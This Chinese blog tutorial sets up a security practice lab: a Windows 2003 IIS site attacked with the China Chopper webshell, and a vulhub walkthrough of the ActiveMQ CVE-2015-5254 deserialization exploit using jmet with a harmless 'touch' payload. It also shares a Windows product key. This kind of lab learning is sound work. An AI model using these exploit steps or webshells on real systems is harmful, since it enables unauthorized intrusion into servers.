搭建安全扩展
安装IIS自建网站
-
虚拟机安装windows 2003版本服务器
安装过程不赘述,可参考网上文档,我使用的是MSDN网站的2003 R2企业版镜像,http://www.msdn3.com/6/34/,秘钥可以使用 MR78C-GF2CY-KC864-DTG74-VMT73,CD2可直接取消不安装
-
安装IIS服务
- 安装.NET Framework 2.0,https://www.microsoft.com/en-us/download/details.aspx?id=6041下载运行即可
- 安装IIS服务,安装流程可以参考https://www.jianshu.com/p/223e39350478,ASP.NET没有可以先不勾选,插入磁盘提示框未弹出直接下一步安装即可
- 安装完后没有默认网站,按下图操作即可https://social.technet.microsoft.com/Forums/windowsserver/de-DE/ddce1adf-32e6-4c6a-8092-2ecf86a36ddb/22312win-2003200133719732622aspnet2961522659?forum=2219
-
部署网站
下载源码部署即可,可参考:https://cloud.tencent.com/developer/article/1482467
-
测试
部署完后可以通过IP地址和域名访问网站,注意域名访问网站需要修改hosts文件解析
中国菜刀测试
-
下载中国菜刀,https://github.com/raddyfiy/caidao-official-version
-
创建一句话木马到网站根目录
-
使用中国菜刀连接
成功进入到服务器中,文件夹安全权限及网站安全策略测试此处不过多赘述,测试即可。
vulhub靶场练习
-
安装docker及docker-compose,此处不过多赘述,可参考我之前写的文章https://blog.csdn.net/qq_44312640/article/details/127254696?spm=1001.2014.3001.5502
-
下载vulhub代码,根据https://vulhub.org/#/environments/文档验证测试,此处演示 ActiveMQ 反序列化漏洞 测试
-
测试流程
git clone git@github.com:vulhub/vulhub.git cd vulhub/activemq/CVE-2015-5254 docker-compose up -d # 下载jmet wegt https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar mkdir external # 安装java apt-get install openjdk-8-jdk -y # 序列化shell命令 java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616 # 登录 http://your-ip:8161/admin/browse.jsp?JMSDestination=event 查看事件,login:admin:admin # 进入docker容器中查看,可以发现 touch /tmp/success 命令已经成功执行 docker-compose exec activemq bash ls /tmp
-